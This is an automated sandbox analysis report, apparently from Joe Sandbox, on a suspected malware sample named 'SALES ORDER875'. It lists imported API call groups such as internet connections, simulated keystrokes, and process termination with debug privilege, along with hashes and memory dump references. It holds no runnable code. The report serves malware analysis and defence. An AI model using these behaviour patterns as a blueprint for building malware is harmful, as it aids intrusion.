                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                                                                    • Opcode ID: 0b0c567d1936920ceeb299bbb8a192ac3912edc02723624e136c62e9ac87913c
                                                                                                                                                                                    • Instruction ID: 4d4872c7757e15a4b88b1eb696671b5084ab5afb527ee9cd78773bc1bd94b6db
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b0c567d1936920ceeb299bbb8a192ac3912edc02723624e136c62e9ac87913c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67519AB1600209EFDF22CF24DC96FAA7BB5FB88350F144529F916972A0DB70E990DB44
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003FC182
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003FC195
                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 003FC1A9
                                                                                                                                                                                      • Part of subcall function 003FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003FC272
                                                                                                                                                                                      • Part of subcall function 003FC253: GetLastError.KERNEL32 ref: 003FC322
                                                                                                                                                                                      • Part of subcall function 003FC253: SetEvent.KERNEL32(?), ref: 003FC336
                                                                                                                                                                                      • Part of subcall function 003FC253: InternetCloseHandle.WININET(00000000), ref: 003FC341
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                                                                    • Opcode ID: 519595ad87ec1c8446fe3b20524f585cd1706a419cef1fc86e1f089ed063ebd0
                                                                                                                                                                                    • Instruction ID: 83a76c99cef4f9c7cf461d4009a7cfd996c07ee5c9ed7183d6d846cc91109fd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 519595ad87ec1c8446fe3b20524f585cd1706a419cef1fc86e1f089ed063ebd0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E31B27159070DBFDB229FA5DE44AB6BBF9FF18300B00982DFA5686611C730E814DBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3A57
                                                                                                                                                                                      • Part of subcall function 003E3A3D: GetCurrentThreadId.KERNEL32 ref: 003E3A5E
                                                                                                                                                                                      • Part of subcall function 003E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E25B3), ref: 003E3A65
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E25BD
                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003E25DB
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003E25DF
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E25E9
                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003E2601
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 003E2605
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E260F
                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003E2623
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 003E2627
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                                                                    • Opcode ID: 68ef9a6aadbfda5419a4f1840b0af5585595bd0f330d8ccb7a340c9fbc0c579e
                                                                                                                                                                                    • Instruction ID: 4836d1e882f25e62ab2762850fbb253db005236319c2fd1b911a32919698521a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68ef9a6aadbfda5419a4f1840b0af5585595bd0f330d8ccb7a340c9fbc0c579e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1201B1302D0364BBFB1067699CCAF9A3E99DB4AB12F104121F358AF0D1C9E224448A6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,003E1449,?,?,00000000), ref: 003E180C
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,003E1449,?,?,00000000), ref: 003E1813
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003E1449,?,?,00000000), ref: 003E1828
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,003E1449,?,?,00000000), ref: 003E1830
                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,003E1449,?,?,00000000), ref: 003E1833
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003E1449,?,?,00000000), ref: 003E1843
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(003E1449,00000000,?,003E1449,?,?,00000000), ref: 003E184B
                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,003E1449,?,?,00000000), ref: 003E184E
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,003E1874,00000000,00000000,00000000), ref: 003E1868
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                    • Opcode ID: 19954fb15ecc731883baa41e2c1e5301b2d2d1496bb09371fae7447a6ba849e9
                                                                                                                                                                                    • Instruction ID: 094ceb8a1de9d6db81c2a6ea225796cb1299ed862e3683cc703bd9f56f0654ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19954fb15ecc731883baa41e2c1e5301b2d2d1496bb09371fae7447a6ba849e9
                                                                                                                                                                                    • Instruction Fuzzy Hash: C401ACB52C0348BFE610AB65DC89F977B6CEB89B11F008421FA05DB191C6709C008F24
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 003ED501
                                                                                                                                                                                      • Part of subcall function 003ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 003ED50F
                                                                                                                                                                                      • Part of subcall function 003ED4DC: CloseHandle.KERNEL32(00000000), ref: 003ED5DC
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040A16D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040A180
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040A1B3
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040A268
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0040A273
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A2C4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                    • Opcode ID: fbb5a325837fe6ffef3ea91dd1ad22b0c376718fef4f09de5a77ca6b75120b4d
                                                                                                                                                                                    • Instruction ID: 9e3292a864c8cd52d85405a6bcf964f63d9ed815c6bfd3f75ef82652b466d2c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbb5a325837fe6ffef3ea91dd1ad22b0c376718fef4f09de5a77ca6b75120b4d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4617A34204342AFD721DF19C894F16BBA1AF44318F1884ADE4669F7E2C77AEC45CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00413925
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0041393A
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00413954
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00413999
                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 004139C6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004139F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                    • Opcode ID: 98e5dbf3de5e0756048b1ee2997720ebc9e2aca921ebfde5e9b2e7344e5df316
                                                                                                                                                                                    • Instruction ID: e11ccc474791df58bc976043674fba2c092ff9532f33575577391050d065314d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e5dbf3de5e0756048b1ee2997720ebc9e2aca921ebfde5e9b2e7344e5df316
                                                                                                                                                                                    • Instruction Fuzzy Hash: E241A371A00218ABEF219F64CC45FEB7BA9EF08354F10052BF958E7291D7799D84CB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003EBCFD
                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 003EBD1D
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 003EBD53
                                                                                                                                                                                    • GetMenuItemCount.USER32(016D6668), ref: 003EBDA4
                                                                                                                                                                                    • InsertMenuItemW.USER32(016D6668,?,00000001,00000030), ref: 003EBDCC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                    • String ID: 0$2
                                                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                                                    • Opcode ID: d09135bc82f6764c3adc54c9407cda40376f466d69eba58ec78b2ef938023ea6
                                                                                                                                                                                    • Instruction ID: 9f3a78715a8b0c8a3729a7740aa272b4e57815641517c4386d9e520ab044173f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d09135bc82f6764c3adc54c9407cda40376f466d69eba58ec78b2ef938023ea6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53518E70A002A99BDB13CFAADC84BEFFBF9AF45314F148229E411AB2D0D7709941CB51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 003A2D4B
                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003A2D53
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 003A2DE1
                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003A2E0C
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 003A2E61
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                    • String ID: &H:$csm
                                                                                                                                                                                    • API String ID: 1170836740-1712441898
                                                                                                                                                                                    • Opcode ID: a3aa634a698ede5fd7af9c66fcc38cef404672ff36f6db56057dd64828fab389
                                                                                                                                                                                    • Instruction ID: f747adb9179846795dee8c41cf907d737934e12a06fdac57cdeba70667d30336
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3aa634a698ede5fd7af9c66fcc38cef404672ff36f6db56057dd64828fab389
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B419134A01209ABCF11DF6CC885A9FBBB5FF46324F158165F824AB392D735EA45CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 003EC913
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                                                    • Opcode ID: 12322e2258d8f8c99806bbbf2b76b584aa2bddaefffd43f4b54f3c49f9b7256f
                                                                                                                                                                                    • Instruction ID: 7c41ab8a8746213c9402a6a34f330367331488f0851fea37a74fc1bbedb3c7be
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12322e2258d8f8c99806bbbf2b76b584aa2bddaefffd43f4b54f3c49f9b7256f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89113A32699356BAF7079B159C83DAE279CDF16314B22112BF500AA1C3E7B86E01526D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                                                                    • Opcode ID: a8a9f477f5252a6afef6d7d4b3f49e854cba3db02dd506877f046c02bb6a1b3b
                                                                                                                                                                                    • Instruction ID: 330c919b5739d6ae26fbec877750310d7019b836e422530d33284d2c6a10d6e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8a9f477f5252a6afef6d7d4b3f49e854cba3db02dd506877f046c02bb6a1b3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9741A365C10168B9CB12EBF4CC8AACFB7ACEF46310F508966E514E7162FB34D255C3A5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,003D682C,00000004,00000000,00000000), ref: 0039F953
                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,003D682C,00000004,00000000,00000000), ref: 003DF3D1
                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,003D682C,00000004,00000000,00000000), ref: 003DF454
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                    • Opcode ID: 39cba8fe9700e81bd031862bcfc43bb65b4e4ce5603e17677bf4e712cd637317
                                                                                                                                                                                    • Instruction ID: 61326870ef93f8f96b54a2a33b3f8b5a58b230ef4911252b99e4d5eb5b22804f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39cba8fe9700e81bd031862bcfc43bb65b4e4ce5603e17677bf4e712cd637317
                                                                                                                                                                                    • Instruction Fuzzy Hash: C541FD31618740BECF3BAB3DDCC876A7BA6AB56314F16843DE047D6A61D771A880CB11
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00412D1B
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00412D23
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00412D2E
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00412D3A
                                                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00412D76
                                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00412D87
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00415A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00412DC2
                                                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00412DE1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                    • Opcode ID: 71f2f5905586a3ed8404307acf4ddbededea48fa3f538124ec12b783746c3ec2
                                                                                                                                                                                    • Instruction ID: 51aa2deafc004ceabb6adbcc9b79c48514f744ba79a9adfaa24212fb19097e2b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71f2f5905586a3ed8404307acf4ddbededea48fa3f538124ec12b783746c3ec2
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6319F72241214BFEB114F50DC89FEB3FA9EF09715F048065FE08DA291C6B59C51CBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                    • Opcode ID: 2807d467a182007781d201a14e62e7acac1a6525ff8e6a2ac97dd8b93d2a12c5
                                                                                                                                                                                    • Instruction ID: e4ebeb6a365fd523907b9a31ac7fd64d3dadc4ace99ff59b8d6ecd1c26e8a0cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2807d467a182007781d201a14e62e7acac1a6525ff8e6a2ac97dd8b93d2a12c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F210771740A697BD6169A228E92FFB335CFF21388F540121FD049EAC1F724ED1581E9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
